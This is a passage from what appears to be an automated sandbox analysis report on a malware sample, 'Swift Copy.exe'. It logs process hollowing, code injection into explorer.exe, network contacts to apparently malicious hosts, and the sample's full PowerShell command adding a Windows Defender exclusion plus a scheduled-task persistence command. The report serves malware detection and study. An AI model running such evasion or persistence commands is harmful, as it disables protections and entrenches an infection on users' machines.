          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0194A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01903D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01943540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01973D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0199070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01908EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01981608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.92.235.55 80
          Source: C:\Windows\explorer.exeDomain query: www.mogdento.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.67.235.120 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.3.130.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exeDomain query: www.kinemartigues.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.159.175.169 80
          Source: C:\Windows\explorer.exeDomain query: www.blackyaga.xyz
          Source: C:\Windows\explorer.exeDomain query: www.epic45.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.expectedclosure.one
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10F1008
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Swift Copy.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3968
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: explorer.exe, 0000000B.00000000.380716731.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.334501812.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287445550.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.339209169.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.306173518.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.381188687.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.317860532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287493311.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Users\user\Desktop\Swift Copy.exe VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
